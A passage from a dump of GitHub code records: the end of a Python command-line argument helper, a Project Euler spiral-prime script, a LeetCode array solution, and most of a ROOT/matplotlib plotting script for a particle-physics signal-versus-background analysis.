self.replaced_bool_args:\n neg_varname = 'not_' + varname\n if neg_varname in self.args:\n neg_val = self.args.__dict__.pop(neg_varname)\n self.args.__dict__[varname] = not neg_val\n\n return self.args\n\n def dispatch_commands(self):\n try:\n if len(_commands):\n if self.args.command is None:\n raise CommandifyError('too few arguments', 'user')\n\n # Get arguments for both commands.\n # Bad choice of name: main_command, clashes with function.\n main_command, main_args, main_kwargs =\\\n list(_main_commands.values())[0]\n main_command_args = self._get_command_args(main_command, self.args)\n if len(_commands):\n command, _, _ = _commands[self.args.command]\n command_args = self._get_command_args(command, self.args)\n\n # Run commands.\n main_ret = main_command(**main_command_args)\n self.args.main_ret = main_ret\n if len(_commands):\n command_ret = command(**command_args)\n return main_ret, command_ret\n else:\n return main_ret, None\n\n except CommandifyError as e:\n if e.error_type == 'user':\n self.print_help()\n self.exit(status=1,\n message='{0}: error: 
{1}\\n'.format(self.prog, e))\n\n def _get_command_args(self, command, args):\n '''Work out the command arguments for a given command'''\n command_args = {}\n command_argument_names =\\\n command.__code__.co_varnames[:command.__code__.co_argcount]\n\n for varname in command_argument_names:\n if varname == 'args':\n command_args['args'] = args\n elif varname in self.provide_args:\n command_args[varname] = self.provide_args[varname]\n else:\n command_args[varname] = getattr(args, varname)\n return command_args\n\n\ndef commandify(use_argcomplete=False, exit=True, *args, **kwargs):\n '''Turns decorated functions into command line args\n\n Finds the main_command and all commands and generates command line args\n from these.'''\n parser = CommandifyArgumentParser(*args, **kwargs)\n parser.setup_arguments()\n if use_argcomplete:\n try:\n import argcomplete\n except ImportError:\n print('argcomplete not installed, please install it.')\n parser.exit(status=2)\n # Must happen between setup_arguments() and parse_args().\n argcomplete.autocomplete(parser)\n args = parser.parse_args()\n if exit:\n parser.dispatch_commands()\n parser.exit(0)\n else:\n return parser.dispatch_commands()\n","repo_name":"markmuetz/commandify","sub_path":"commandify/commandify.py","file_name":"commandify.py","file_ext":"py","file_size_in_byte":11105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13367402022","text":"from math import sqrt, floor\n\ndef diag(n):\n lista = []\n counter = 1\n j = 0\n while True:\n j += 1\n for i in range(1,5):\n lista.append(counter)\n counter = counter + 2*j\n if counter>n:\n return lista\n\ndef sieve(n):\n primes = [True for i in range(n)]\n primes[0] = False\n primes[1] = False\n for i in range(2,floor(sqrt(n))+1):\n if primes[i] == True:\n for j in range(i**2,n,i):\n primes[j] = False\n return primes\n\nn = 30000\nbiglist = sieve(n**2+1)\ndiagona = diag(n**2)\n\nm = 25000\nwhile True:\n m +=1\n suma = 0\n dlugosc = 1+4*(m-1)/2\n for i in range(1,int(dlugosc)):\n if biglist[diagona[i]] == True:\n suma += 1\n if m%10**3 == 0:\n print(m,suma/dlugosc)\n if(suma/dlugosc<0.1):\n print(m)\n break\n","repo_name":"098799/project_euler","sub_path":"archive/058/spiral.py","file_name":"spiral.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71467035346","text":"# 80. 
Remove Duplicates from Sorted Array II\n\nclass Solution:\n def removeDuplicates(self, nums: int) -> int:\n if len(nums) <= 2:\n return len(nums)\n\n currentIndex = 2\n for i in range(2, len(nums)):\n if (nums[i] != nums[currentIndex - 2]):\n nums[currentIndex] = nums[i]\n currentIndex += 1\n\n return currentIndex\n \n\nexercise = Solution()\ninput = [0,0,0,1,1,1,1,2,2,2,2,2,2,3,3,3,4,4,4,4,4,5,5,6]\nexpected_output = 13\noutput = exercise.removeDuplicates(input)\nprint(output, input[:output])\nassert output == expected_output, \"Wrong answer\"\nprint(\"Accepted\")\n","repo_name":"JaviBT/leetcode-problems","sub_path":"problems/_80_leetcode.py","file_name":"_80_leetcode.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8745061979","text":"import ROOT\nROOT.gROOT.SetBatch(True)\nimport math\nimport utils.DataSetInfo as info\nimport optparse\nimport copy\nimport os\nfrom array import array\nimport numpy as np\nimport utils.CMS_lumi as CMS_lumi\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pandas as pd\nfrom utils.var import var as vars\n# from utils.variables import variables as vars\n\nmpl.rc(\"font\", family=\"serif\", size=15)\n\n# color definition, needed for python plots for consistent color scheme\ncolorDict = {\n (ROOT.kGray + 1): \"#999999\",\n (ROOT.kYellow + 1): \"#cccc19\",\n (ROOT.kBlue - 6): \"#6666cc\",\n (ROOT.kGreen + 1): \"#4bd42d\",\n (ROOT.kMagenta + 1): \"#cd2bcc\",\n (ROOT.kOrange+2): \"#cc660d\",\n (ROOT.kRed): \"#f2231b\",\n (ROOT.kViolet-1): \"#9a27cc\",\n (ROOT.kOrange+3): \"#663303\",\n (ROOT.kPink+1): \"#f69acc\",\n (ROOT.kGray): \"#cccccc\",\n (ROOT.kYellow+2): \"#999910\",\n (ROOT.kCyan): \"#5efdff\",\n}\n\n# signal vs. 
background figure of merit\ndef fom(S,B):\n return np.sqrt(2 * ( (S+B) * np.log(1+S/B) - S) )\n\ndef signif(S,B):\n return S/(np.sqrt( B + (0.3*B)**2 ))\n\ndef getLabel(label):\n si = label.find(\"(\")\n sourceLabel = label[:si-1]\n return sourceLabel\n\ndef makeDirs(plotOutDir,cut,plotType):\n if not os.path.exists(plotOutDir+\"/\"+plotType+\"/\"+cut[1:]):\n os.makedirs(plotOutDir+\"/\"+plotType+\"/\"+cut[1:])\n\ndef find_nearest(trgeff, target):\n trgeff = np.asarray(trgeff)\n idx = (np.abs(trgeff - target)).argmin()\n return int(trgeff[idx])\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(np.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(n / i)\n for divisor in reversed(large_divisors):\n yield divisor\n\ndef rebinCalc(nBins,target):\n rebinFloat = nBins/float(target)\n allDivs = list(divisorGenerator(nBins))\n return find_nearest(allDivs, rebinFloat)\n\ndef normHisto(hist, doNorm=False):\n if doNorm:\n if hist.Integral() > 0:\n hist.Scale(1.0/hist.Integral())\n\ndef simpleSig(hSig, hBg):\n sig = 0.0\n for i in range(0, hSig.GetNbinsX()):\n totBG = hBg.GetBinContent(i)\n nSig = hSig.GetBinContent(i)\n if(totBG > 1.0 and nSig > 1.0):\n s = nSig / math.sqrt( totBG + (0.3*totBG)**2 )\n sig = math.sqrt(sig**2 + s**2)\n return sig\n\ndef getBGHistos(data, histoName, rebinx, xmin, xmax):\n hs = ROOT.THStack()\n hMC = None\n hList = []\n firstPass = True\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, fill=True, showEvents=True)\n hist = copy.deepcopy(h)\n hs.Add(hist)\n hList.append((hist, d.legEntry()))\n if(firstPass):\n hMC = hist\n firstPass = False\n else:\n hMC.Add(hist)\n return hs, hMC, hList\n\ndef getData(path, scale=1.0, year = \"2018\"):\n Data = [\n # info.DataSetInfo(basedir=path, fileName=year+\"_DataSR.root\", sys= -1.0, label=\"Data\", scale=scale),\n info.DataSetInfo(basedir=path, fileName=year+\"_DataCR.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2018_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2017_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2016_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n ]\n # print(\"Data = \",Data)\n\n # qdm_qsmDir = \"condor/testHadd_main_01062022_noEtaCut_pT170_withJetCat_pairProduction\"\n # Normal\n bgData = [\n # info.DataSetInfo(basedir=path, fileName=year+\"_Triboson.root\", label=\"VVV\", scale=scale, color=(ROOT.kGray)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_Diboson.root\", label=\"VV\", scale=scale, color=(ROOT.kMagenta + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_DYJetsToLL_M-50.root\", label=\"Z#gamma*+jets\", scale=scale, color=(ROOT.kOrange + 2)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_TTX.root\", label=\"ttX\", scale=scale, color=(ROOT.kCyan + 1)),\n info.DataSetInfo(basedir=path, fileName=year+\"_ST.root\", label=\"Single top\", scale=scale, color=(ROOT.kRed + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ZJets.root\", label=\"Z#rightarrow#nu#nu+jets\", scale=scale, color=(ROOT.kGray + 1)),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_tZq.root\", label=\"ST tZq\", scale=scale, color=(ROOT.kRed)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_s-channel.root\", label=\"ST s-channel\", scale=scale, color=(ROOT.kGreen + 3)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_tW.root\", label=\"ST 
tW\", scale=scale, color=(ROOT.kPink + 7)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_t-channel.root\", label=\"ST t-channel\", scale=scale, color=(ROOT.kTeal)),\n \n\n info.DataSetInfo(basedir=path, fileName=year+\"_TTJets.root\", label=\"t#bar{t}\", scale=scale, color=(ROOT.kBlue - 6)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_WJets.root\", label=\"W+jets\", scale=scale, color=(ROOT.kYellow + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_QCD.root\", label=\"QCD\", scale=scale, color=(ROOT.kGreen + 1)),\n # full bkg sample\n # info.DataSetInfo(basedir=path, fileName=year+\"_mTTJetsmini_Inc_noEtaCut_pT50.root\", label=\"t#bar{t}\", scale=scale, color=(ROOT.kBlue - 6)),\n info.DataSetInfo(basedir=path, fileName=year+\"_ZJets.root\", label=\"Z#rightarrow#nu#nu+jets\", scale=scale, color=(ROOT.kGray + 1)),\n info.DataSetInfo(basedir=path, fileName=year+\"_WJets.root\", label=\"W+jets\", scale=scale, color=(ROOT.kYellow + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_TT.root\", label=\"t#bar{t} (pow)\", scale=scale, color=(ROOT.kBlue - 6)),\n info.DataSetInfo(basedir=path, fileName=year+\"_QCD.root\", label=\"QCD\", scale=scale, color=(ROOT.kGreen + 1)),\n ]\n #\n sgData = [\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 600\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-1_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-1\",scale=scale, color=ROOT.kCyan),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p1\",scale=scale, color=ROOT.kGray+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"baseline\", scale=scale, color=ROOT.kViolet+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-50_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-50\",scale=scale, color=ROOT.kViolet+5),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p5\",scale=scale, color=ROOT.kYellow),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-100_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-100\",scale=scale, color=ROOT.kPink+9),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p7\",scale=scale, color=ROOT.kCyan+4),\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 3000\", scale=scale, color=ROOT.kMagenta+1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 600\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 800\", scale=scale, color=ROOT.kGreen),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 2000\", scale=scale, color=ROOT.kBlue),\n # info.DataSetInfo(basedir=path, fileName=\"2017_mZprime-3000_mDark-20_rinv-0p3_alpha-peak.root\", label=\"s-ch baseline\", scale=scale, color=ROOT.kRed),\n # 
info.DataSetInfo(basedir=path, fileName=year+\"_mMed-6000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 6000\", scale=scale, color=ROOT.kCyan,)\n ## varying mMed\n\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-500_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 500\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 600\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 800\", scale=scale, color=ROOT.kRed),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-1000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 1000\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-1500_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 1500\", scale=scale, color=ROOT.kGray+4),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"baseline\", scale=scale, color=ROOT.kOrange+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 3000\", scale=scale, color=ROOT.kCyan),\n \n # # info.DataSetInfo(basedir=path, fileName=\"2017_mZprime-3000_mDark-20_rinv-0p3_alpha-peak.root\", label=\"s-ch 3000\", scale=scale, color=ROOT.kRed),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed+2),\n \n # ## varying mDark\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-1_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-1\",scale=scale, color=ROOT.kViolet-5),\n \n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_mD-20\",scale=scale, color=ROOT.kGreen+2),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-50_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_mD-50\",scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-50_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-50\",scale=scale, color=ROOT.kViolet+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-100_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-100\",scale=scale, color=ROOT.kViolet+6),\n \n # ## varying rinv\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p1\",scale=scale, color=ROOT.kOrange+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p5\",scale=scale, color=ROOT.kOrange+9),\n \n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_r-0p3\",scale=scale, color=ROOT.kGreen+2),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p5_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_r-0p5\",scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", 
label=\"M-2000_r-0p7\",scale=scale, color=ROOT.kOrange-9),\n \n # ## varying alpha\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-low_yukawa-1.root\", label=\"M-2000_a-low\",scale=scale, color=ROOT.kGray),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_a-peak\",scale=scale, color=ROOT.kGreen+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-high_yukawa-1.root\", label=\"M-2000_a-high\",scale=scale, color=ROOT.kYellow+2),\n ## varying rinv at mMed 800\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p1\", scale=scale, color=ROOT.kOrange + 2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p3\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p5\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p7\", scale=scale, color=ROOT.kGreen),\n ## comparing QdM and QsM jets\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed400.root\", label=\"mMed 400 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed400.root\", label=\"mMed 400 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed600.root\", label=\"mMed 600 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed600.root\", label=\"mMed 600 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed800.root\", label=\"mMed 800 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed800.root\", label=\"mMed 800 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed1000.root\", label=\"mMed 1000 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed1000.root\", label=\"mMed 1000 QsM\", scale=scale, color=ROOT.kBlack),\n\n ]\n # print(sgData, bgData)\n return Data, sgData, bgData\n\ndef setupAxes(dummy, xOffset, yOffset, xTitle, yTitle, xLabel, yLabel):\n dummy.SetStats(0)\n dummy.SetTitle(\"\")\n dummy.GetXaxis().SetTitleOffset(xOffset)\n dummy.GetYaxis().SetTitleOffset(yOffset)\n dummy.GetXaxis().SetTitleSize(xTitle)\n dummy.GetYaxis().SetTitleSize(yTitle)\n dummy.GetXaxis().SetLabelSize(xLabel)\n dummy.GetYaxis().SetLabelSize(yLabel)\n if(dummy.GetXaxis().GetNdivisions() % 100 > 5): dummy.GetXaxis().SetNdivisions(6, 5, 0)\n\ndef setupDummy(dummy, leg, histName, xAxisLabel, yAxisLabel, isLogY, xmin, xmax, ymin, ymax, lmax, norm=False, normBkg=False,isRatio=False):\n \n if isRatio:\n setupAxes(dummy, 0, 1.05, 0.0, 0.05, 0.0, 0.05)\n dummy.GetXaxis().SetTitle(\"\")\n \n else: \n setupAxes(dummy, 1.2, 1.6, 0.045, 0.045, 0.045, 0.045)\n dummy.GetXaxis().SetTitle(xAxisLabel)\n \n dummy.GetYaxis().SetTitle(yAxisLabel)\n dummy.SetTitle(histName)\n #Set the y-range of the histogram\n if(isLogY):\n if 
norm:\n default = 0.00001\n else:\n default = 0.02\n locMin = min(default, max(default, 0.05 * ymin))\n legSpan = (math.log10(3*ymax) - math.log10(locMin)) * (leg.GetY1() - ROOT.gPad.GetBottomMargin()) / ((1 - ROOT.gPad.GetTopMargin()) - ROOT.gPad.GetBottomMargin())\n legMin = legSpan + math.log10(locMin)\n if(math.log10(lmax) > legMin):\n scale = (math.log10(lmax) - math.log10(locMin)) / (legMin - math.log10(locMin))\n if norm:\n ymax = 2.\n else:\n ymax = pow(ymax/locMin, scale)*locMin\n # ymax = 10**8\n # dummy.GetYaxis().SetRangeUser(locMin, 10*ymax)\n dummy.GetYaxis().SetRangeUser(locMin, ymax*10e-5)\n else:\n locMin = 0.0\n legMin = (1.2*ymax - locMin) * (leg.GetY1() - ROOT.gPad.GetBottomMargin()) / ((1 - ROOT.gPad.GetTopMargin()) - ROOT.gPad.GetBottomMargin())\n if(lmax > legMin): ymax *= (lmax - locMin)/(legMin - locMin)\n # dummy.GetYaxis().SetRangeUser(0.0, ymax*1.2)\n dummy.GetYaxis().SetRangeUser(0.0, ymax)\n #set x-axis range\n if(xmin < xmax): dummy.GetXaxis().SetRangeUser(xmin, xmax)\n # print(\"ymax in dummy = \",ymax)\n\ndef makeRocVec(h,reverse=False,ignoreUnderflow=False):\n if h.Integral() > 0.0:\n h.Scale( 1.0 / h.Integral() );\n v, cuts = [], []\n si = 1\n if ignoreUnderflow == True:\n si = -1\n for i in range(si, h.GetNbinsX()+1):\n if reverse:\n val = h.Integral(si, i)\n else:\n val = h.Integral(i, h.GetNbinsX())\n v.append(val)\n cuts.append(h.GetBinLowEdge(i))\n return v, cuts\n\ndef ROCArea(n,mBg,mSig):\n mBgAr = [1] + mBg + [0]\n mSigAr = [0] + mSig + [0]\n gAr = ROOT.TGraph(n, array(\"d\", mBgAr), array(\"d\", mSigAr))\n gArea = round(gAr.Integral(),2) # original way\n # gArea = round(np.trapz(mBgAr,mSigAr),2)\n return gArea\n\ndef drawRocCurve(fType, rocBgVec, rocSigVec, leg, manySigs=False, stList=None, allRocValues=None, baseline=\"baseline\", mainBkg = \"QCD\"):\n # saving all the ROC scores for all signals and backgrounds\n rocValues = pd.DataFrame(columns=[\"cut\",\"var\",\"sig\",\"bkg\",\"roc_auc\",\"cutDir\",\"varCut\",\"cBg\",\"cSig\",\"mBg\",\"mSig\"])\n for mBg, cutBg, lBg, cBg in rocBgVec:\n for mSig, cutSig, lSig, cSig in rocSigVec:\n n = len(mBg)\n gArea = ROCArea(n,mBg,mSig)\n rv = \">=cut\"\n if gArea < 0.5:\n mBg_f = 1 - np.array(mBg)\n mSig_f = 1 - np.array(mSig)\n rv = \"<=cut\"\n gArea = 1 - gArea\n else:\n mBg_f = mBg\n mSig_f = mSig\n rocValues.loc[len(rocValues.index)] = stList + [lSig,lBg,round(gArea,3),rv,cutSig,cBg,cSig,mBg_f,mSig_f]\n allRocValues.loc[len(allRocValues.index)] = stList + [lSig,lBg,round(gArea,3),rv,cutSig,colorDict[cBg],colorDict[cSig],mBg_f,mSig_f]\n if manySigs:\n rocValues = rocValues[rocValues[\"bkg\"] == mainBkg]\n colLabel = \"cSig\"\n varMCLabel = \"sig\"\n mainMC = mainBkg\n else:\n rocValues = rocValues[rocValues[\"sig\"] == baseline]\n colLabel = \"cBg\"\n varMCLabel = \"bkg\"\n mainMC = baseline\n h = []\n for varMC in list(rocValues[varMCLabel]):\n datai = rocValues[rocValues[varMCLabel] == varMC].iloc[0]\n n = len(datai[\"mBg\"])\n g = ROOT.TGraph(n, array(\"d\", datai[\"mBg\"]), array(\"d\", datai[\"mSig\"]))\n rebinx = rebinCalc(n,20)\n for i in range(0,n):\n if i % rebinx == 0:\n latex = ROOT.TLatex(g.GetX()[i], g.GetY()[i],str(round(datai[\"varCut\"][i],2)))\n latex.SetTextSize(0.02)\n latex.SetTextColor(ROOT.kRed)\n g.GetListOfFunctions().Add(latex) # add cut values\n g.SetLineWidth(2)\n g.SetLineColor(datai[colLabel])\n g.SetMarkerSize(0.7)\n g.SetMarkerStyle(ROOT.kFullSquare)\n g.SetMarkerColor(datai[colLabel])\n g.Draw(\"same LP text\")\n leg.AddEntry(g, \"#splitline{\" + fType + \" \" + mainMC + 
\" vs \" + varMC + \"_\" + datai[\"cutDir\"] + \"}{(\"+\"{:.2f}\".format(datai[\"roc_auc\"])+\")}\", \"LP\")\n h.append(g)\n return h\n\ndef plotSignificance(data, histName, totalBin, xlab, plotOutDir, cut, isLogY=False, rebinx=-1.0, xmin=999.9, xmax=-999.9, reverseCut=False, signifValues=None):\n rocBgVec = []\n histoName = histName + cut\n outputPath = plotOutDir+\"/FOM/\"+cut[1:]\n rebinValue = rebinx # how many bins to merge into 1 bin\n\n # background\n print(\"histoName\",histoName)\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=True)\n h.Rebin(rebinValue)\n hIn = h.Integral()\n effList = np.array(makeRocVec(h,reverseCut)[0]) * hIn\n rocBgVec.append([effList])\n\n sigLabelList = []\n # signal\n rocSigVec = []\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=True)\n h.Rebin(rebinValue)\n hIn = h.Integral()\n eff = np.array(makeRocVec(h,reverseCut)[0])\n effList = eff * hIn\n rocSigVec.append([effList,d.legEntry()])\n sigLabelList.append(d.legEntry())\n cutValues = np.array(makeRocVec(h)[1])\n\n B = np.zeros(len(cutValues))\n for rbv in rocBgVec:\n B += rbv[0]\n\n fomList = []\n normedfomList = []\n normedcutList = []\n cutList = []\n\n colorList = ['b','g','r','c','m','y']\n lineStyles = [\"solid\",\"dashed\",\"dotted\"]\n # comparing the locations of maximum FOM for different signals\n fig = plt.figure(figsize=(12,8))\n ax = plt.subplot(111)\n for i in range(len(rocSigVec)):\n rsv = rocSigVec[i]\n fo = fom(rsv[0],B)\n foReal = np.ma.masked_invalid(fo)\n fomList.append(foReal)\n maxFOM = foReal.max()\n normedfomList.append(foReal/maxFOM)\n cutList.append(cutValues)\n newEntry = [cut,histName.replace(\"h_\",\"\"),rsv[1],maxFOM]\n signifValues.loc[len(signifValues.index)] = newEntry\n lstyle = \"solid\"\n mstyle = \"o\"\n if i > len(colorList) - 1:\n lstyle = \"dashed\"\n mstyle = \"D\"\n if i > len(colorList)*2 - 1:\n lstyle = \"^\"\n ax.plot(cutValues[:-1],foReal[1:]/maxFOM,label=rsv[1] + \" ({:.1e})\".format(maxFOM), marker=mstyle, linestyle=lstyle, color=colorList[i%len(colorList)])\n\n pltTitle = \">= cut\"\n if reverseCut:\n pltTitle = \"<= cut\"\n\n ax.plot(cutList[0][:-1],np.ma.masked_invalid(normedfomList).mean(axis=0)[1:],label=\"Average\",linewidth=5,alpha=0.5,color=\"black\")\n ax.set_title(pltTitle)\n ax.legend(loc='upper right', fontsize=12, ncol=3)\n ax.set_ylabel(\"Normalized FOM ( sqrt(2((S+B)*log(1+S/B)-S)) )\")\n ax.set_xlabel(xlab)\n ax.set_ylim(0,1.5)\n plt.savefig(outputPath + \"/FOM_\" + histoName+\".png\")\n\n # # comparing signal efficiency for different signals\n # plt.figure(figsize=(12,8))\n # for i in range(len(sEffList)):\n # seff = sEffList[i]\n # siglab = sigLabelList[i]\n # plt.step(cutList[i],seff,label=siglab)\n # plt.legend()\n # plt.ylabel(\"Signal Efficiency\")\n # plt.xlabel(xlab)\n # plt.grid()\n # plt.savefig(outputPath + \"/sigEff_\" + histoName+\".png\")\n\n # # comparing FOM and signal efficiency for each signal\n # for i in range(len(sigLabelList)):\n # slabel = sigLabelList[i]\n # foms = fomList[i]\n # cutValues = cutList[i]\n # seffs = sEffList[i]\n #\n # fig, ax1 = plt.subplots()\n #\n # color = 'red'\n # ax1.set_xlabel(xlab)\n # ax1.set_ylabel(\"FOM: sqrt(2((S+B)*log(1+S/B)-S))\")\n # ax1.step(cutValues,foms,color=color)\n # ax1.tick_params(axis='y',labelcolor=color)\n #\n # ax2 = ax1.twinx()\n #\n 